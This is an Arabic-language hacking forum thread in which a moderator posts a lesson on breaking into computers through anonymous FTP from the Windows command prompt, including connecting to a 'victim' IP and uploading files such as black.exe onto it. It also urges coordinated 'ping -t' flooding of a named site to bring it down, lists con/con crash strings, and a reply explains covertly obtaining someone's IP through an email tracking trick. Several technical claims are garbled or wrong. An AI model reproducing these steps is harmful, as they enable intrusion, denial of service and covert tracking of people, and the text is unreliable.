منتديات مدرسة المشاغبين

مشاهدة : 2663
صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 15 من 22
  1. #1
    مشاغب الثانوية غير متصل مشرف قدير سابق
    الدولة
    الرياض
    المشاركات
    1,109





    هذي مِو دورة اختراق وإنما درس



    تعلمته وحبيت افيد المنتدى فيه


    يظبط ببعض المواقع طبعا اختراق لااجهزة عَن طريق الموقع

    .


    بعضها يا جماعة الخير

    <<<<<<<<<الحين يجيني واحد ويجرب علي مِدرسة المشاغبين
    .

    المهم
    .

    نبدا
    .


    افَتح الدوس



    طريقَة فَتح الدوس

    افَتح ابدا

    run اكتب cmd

    مبرووك




    فتحت الدوس


    ملاحظة نظامِ دوس مِختلف عَن نظامِ الويندوز بس نظامِ الويندوز قائمِ علي نظامِ الدوس

    اكتب الامر التالي


    ftp n

    بعدين

    نكتب
    open

    بعدين

    IP الضحية

    عحسب اللي بيجيك نكمل



    احيانا يقلك مِا شبك علي البورت 23
    .انت ترجع تكتب open

    بس جنبها 21

    لانو هَذا بورت نقل الملفات



    طيب

    لازمِ يطلع لك
    connect to IP
    220 websrv1 Microsoft FTP Service Version 4.0)



    حلو بَعدين
    اكتب
    quote user ftp
    انت تابع ايش قاعد برد عليك الملقمِ

    331 Anonymous acces allowed, send identify e-mail name as password.

    كويس



    نتابع

    quote cwd ~root

    لازمِ يكتب

    530 Please login with USER and PASS

    بعدين أنت اكتب
    quote pass ftp

    لازمِ يكتب

    230 Anonymous user logged in


    مبروك اهنيك دخلت

    هذي اوامر تفيدك

    Pwd
    لكي تعرف مِا يحتويه الهارد ديسك
    Cd
    لاقتحامِ مِجلد مِثال
    Cd black
    في هدا المثال قمت باقتحامِ مِجلد المسمي بلاك
    Ls
    لكي يتضح لك مِحتَوي المجلد أو الهارد ديسك
    Get
    لكي تحمل الي سطح المكتب مِِن جهازك
    مثال
    Get black.exe
    Put
    العملية الع**ية ل
    Get
    يَعني ان تاخد مِلف مِِن سطح المكتب مِِن جهازك و تضعه فِي
    في جهاز الضحية
    مثال
    Put black.exe
    Clos
    لقطع الاتصال مَِع الضحية


    ملاحظة

    في اوامر مِا ذكرتها



    روح علي الدوس

    واكتب
    ftp
    بعدين
    help

    ملاحظات مُِهمة

    1-اكتب الامرmsconfig لمعرفة البرامج اللتي تعمل وقْت التشغيل أو عِند بدء التشغيل ولتتجنب الاختراق يُمكنك عَن طريق هَذا الامر ثَُمِ اذهب الي بدء التشغيل وانظر الي البرامج العامله وقمِ باطفاءَ أي برنامج غريب يعمل عِند بدء التشغيل

    2 الامر Control لفَتح لوحة التحكمِ

    3 الامر telnet لفَتح نافذة التلنت والاتصال بجهاز بعيد بمعرفة الاي بي والبورت

    4 الامر ping http://www.israel.org/ لمعرفة IP الموقع ويستعمل فِي الهجومِ ضد الموقع
    ملاحظه/هُناك مِسافه بَين ping http
    يمكنك تغير israel.org باي مِوقع

    5 الامر ping twww.israel.org لارسال رسايل تتسَبب فِي أنهيار الموقع عِند اجتماع الكثير مِِن المستخدمين علي القيامِ بها ضد مِوقع مِعين

    6 الامر netstat n لاظهار IP أي شخص أنت ترسل لَه مِلف عَبر الماسنجر اكتب هَذا الامر بينما أنت ترسل وسيظهر IP تبعه فِي مِوجة الدوس والاي بي تبعك أنت ايضا

    7 الامر winipcfg لمعرفة IP الخاص بك

    8 الامر System.ini انظر الي السطر السادس ولابد ان يَكون هكذا user.exe=user.exe والا فجهازك مِخترق
    9 الامر regedit ثَُمِ اتبع الاتي

    HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Curr entVersion>Run واي مِلف يحمل امتداد exe واسمه name قمِ بحذفه فَهو الباتش تقريبا


    --------------------------------------------------------------------

    اما بخصوص بينق تدمير المواقع فَهي كالتالي:
    1 ping http://www.israel.org/ لمعرفة IP الموقع

    2 ping t http://www.israel.org/ يحمل الضغط علي الموقع المستضيف

    3 ping t a f http://www.israel.org/ يقُومِ باعطاءَ اوامر الي المستضيف

    4 ping w timeout http://www.israel.org/ قومِ بتوضيح سرعة الموقع الحالية


    --------------------------------------------------------------------

    10 كَيف تستخدمِ اوامر الدوس فِي بَعض الهجومِ
    con/con.wav
    com1/com1.wav
    com2/com2.wav


    مايستطيع فعله netstat

    ==============================================

    NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
    NETSTAT مِسافة-A يظهر ارقامِ الايبي المتصلة وحالتها
    NETSTAT مِسافة-E يظهر حالة الشبكة بشَكل عامِ
    NETSTAT مِسافة-N يظهر ارقامِ البورتات والايبيات المتصلة
    NETSTAT مِسافة-P يظهر البروتوكولات المتصلة بجهازك
    NETSTAT مِسافة-R يظهر اجهزة الروترز فِي شبكتك
    NETSTAT مِسافة-S يظهر حالة الشبكة والاجهزة المتصلة

    _____________


    اعتذر علي عدَمِ الترتيب
    بس والله ضغط دراسة واختبارت والخ
    ..

    ارجو الدعاءَ لِي بالتوفيق





    تخياتي مِشاغب الثانوية
    التعديل الأخير تم بواسطة مشاغب الثانوية ; 13/05/2012 الساعة 10:48 PM

  2. #2
    krisby174 غير متصل طالب ابتدائي
    الدولة
    مصر - الاسكندرية
    المشاركات
    66
    جميل يا مِبدع بس أنا مِلقتش فِي اللي قلت علية بالسطر السادس يَعني أنا مِخترق

    هل لاني بجرب تبليغ الباتش فِي نفْسي الاول ولا اية ساعدني وشكرا علي الموضوع أنا حقرآة مِِن جديد كويس لانة مُِهمِ جدا

  3. #3
    صورة السيّد العلوي
    السيّد العلوي غير متصل مراقب قدير سابق
    الدولة
    مكة المكرمة - كدي
    المشاركات
    3,880
    مممبدع كالعادة يا غالي

    الف شكر علي طرحك المميزة
    [CAUTION]


    [GLINT]لا إله إلا الله محمد رسول الله[/GLINT]
    دورة [المشاغبين] لتعليم هكر Bifrost من الف إلى الياء للمبتدئين




    ممنوع التدخين في المنتدى


    ملاحظة:


    • طلب إختراق حسابات من رسالة خاصة أو بالقسم مرفوضـ !! أو طلب آخر يوجد قسم مختص بذلك

    وذالك لكثرة طلبات الإختراق وطلبات سيرفرات مشفرة وغيرها في رسالة خاصة!!

    [/CAUTION]

  4. #4
    مشاغب الثانوية غير متصل مشرف قدير سابق
    الدولة
    الرياض
    المشاركات
    1,109
    بخصوص اخي كرسبي ي سطر تقصد بالزبط


    اما عبد الوهاب
    .
    عراسي والله نورت الموضوع والله

  5. #5
    krisby174 غير متصل طالب ابتدائي
    الدولة
    مصر - الاسكندرية
    المشاركات
    66
    8 الامر System.ini انظر الي السطر السادس ولابد ان يَكون هكذا user.exe=user.exe والا فجهازك مِخترق

  6. #6
    مشاغب الثانوية غير متصل مشرف قدير سابق
    الدولة
    الرياض
    المشاركات
    1,109
    نكتب الامر فِي الدوس

    System.ini

    بيفَتح لك مِذكرة اقرا السطر السادس أو السابع



    لازمِ يجبلك


    user.exe=user.exe

    user

    اسمِ الجهاز يعني

    احيانا يزيد ارقامِ مِِن عنده

    ويَعني مِو اكيدة عفكرة يَعني

    والاوامر هِي مِوجودة بموضوع قديمِ بهَذا المنتدى مِِن عامِ 2008 وكاتب فيه تفصيل بكرة بجبلك ياه لاني نعسسسسسسسسسسست
    .

  7. #7
    krisby174 غير متصل طالب ابتدائي
    الدولة
    مصر - الاسكندرية
    المشاركات
    66
    Ega80woa.fon=ega80woa.fon

    هي هِي مِش مُِهمِ تمامِ كدة

  8. #8
    مشاغب الثانوية غير متصل مشرف قدير سابق
    الدولة
    الرياض
    المشاركات
    1,109
    تشغيل ثَُمِ اكتب الامر التالي
    System.ini
    ستفَتح أمامك مِذكره وفيها كتابات انقليزية أنت يهمك الآن مِِن هَذه المذكرة كلمة باسوورد ستجدها قريبا مِِن آخر الصفحة
    كلمة باسوورد بالانقليزي وتحتها وندوز وامامه امتداد الملف الَّذِي فيه الباسووردات التابعه لك أو التابعه لكُل مِِن يستخدمِ الجهاز
    اذهب الي نفْس الامتداد فِي الوندوز وستجده
    انت الآن فِي الخيار مِِن امرك اما الحذف واما ان تبقي عَليه

  9. #9
    مشاغب الثانوية غير متصل مشرف قدير سابق
    الدولة
    الرياض
    المشاركات
    1,109
    معلومة علي الطاير _^

  10. #10
    krisby174 غير متصل طالب ابتدائي
    الدولة
    مصر - الاسكندرية
    المشاركات
    66
    ; for 16-bit app support

    [drivers]
    wave=mmdrv.dll
    timer=timer.drv

    [mci]
    [driver32]
    [386enh]
    woafont=dosapp.FON
    EGA80WOA.FON=EGA80WOA.FON
    EGA40WOA.FON=EGA40WOA.FON
    CGA80WOA.FON=CGA80WOA.FON
    CGA40WOA.FON=CGA40WOA.FON

    دة اللي ظهرلى

  11. #11
    مشاغب الثانوية غير متصل مشرف قدير سابق
    الدولة
    الرياض
    المشاركات
    1,109
    قمِ بفَتح مِلف System.ini حيثُ انك سوفَ تجده بالمكان التالي C:\WINDOWS الآن وبعد فَتحك للملف سوفَ تجد اسماءَ الاقسامِ تظهر بَين قوسين
    ويؤلف كُل اسمِ مِفتاحي Keyname والقيمة Value
    المتعلقة بها ضمن قسمِ مِا وهَذا مِا يسمي بالتوجيه التجهيزي Configuration directive وتمكننا بَعض هَذه التوجيهات مِِثل 32BitDiskaccess مِِن الحصول علي مِيزة مِا أو توقف عملها
    وفي حالة الاحرف كبيرة امِ صغيرة فِي الاسماءَ المفتاحية غَير مُِهمة
    أي ان 32BitDiskaccess تكافئ الكلمة المفتاحية السابقة
    اما القيمة On فيمكن كتابتها كالرقمِ 1 أو True أو Yes ويمكننا بشَكل مِشابه ايقاف عمل مِيزة مِا بتحديد قيمة 0 لَها أو احدي القيمِ Off أو No أو False اما بَعض العبارات الاخري مِِثل PerVMFiles=20 فليست عبارات نعمِ أو لا بسيطة
    ولكنها تحدد قيمة صحيحة مِعينة



    والآن لتنفحص مِحتويات مِلف System.ini قسمِ قسمِ مِِن المحتمل ان يحتَوي مِلف System.ini لديك علي بَعض الاقسامِ الغير مِشروحة هُنا والَّتِي تضيفها عادة برامج قيادة الاجهزة والبرامج المقدمة مِِن الجهات الاخري


  12. #12
    Sure250 غير متصل جاي معه ملفه
    المشاركات
    2
    طيب مُِمكن تقولي كَيف احصل علي الاي بي بِدون اني احط باتش فِي جهاز الضحية

  13. #13
    مشاغب الثانوية غير متصل مشرف قدير سابق
    الدولة
    الرياض
    المشاركات
    1,109
    تروح تبعت للشخص اللي أنت تبي تعرف الاي بي حقه أي ايميل مِِن عندك وانت تكتب الايميل تزود عَليه الامر
    confirm.TO
    يَعني إذا فرضنا بريد الي تبي ترسل لَه
    xxxxx hotmail.com
    يصير تضيف بَعد عنوان البريدهَذا الامر كَانك تكتب الايميل بالشَكل العادي بس تضيف له

    xxxxx hotmail.confirm.to-1
    او
    xxxxx hotmailconfirm.to-2

    وبكذي لما هُو يفَتح الرساله تجيك أنت رساله تعلمك أنه فَتح رسالتك بنفس اللحظه الي هُو فَتحها وهو طبعا رقمِ الاي بي الخاص به
    وطبعا هُو مِا راح يعرف


    في طرق كثِيرة

    ومِنها عَن طريق الامر NETSTAT N


    او عَن طريق أي فايير وول

  14. #14
    batrot غير متصل جاي معه ملفه
    المشاركات
    46
    مشكور علي المجهوود

  15. #15
    مشاغب الثانوية غير متصل مشرف قدير سابق
    الدولة
    الرياض
    المشاركات
    1,109
    العفو اخوي

صفحة 1 من 2 12 الأخيرةالأخيرة


Content Relevant URLs by vBSEO ©2011, Crawlability, Inc.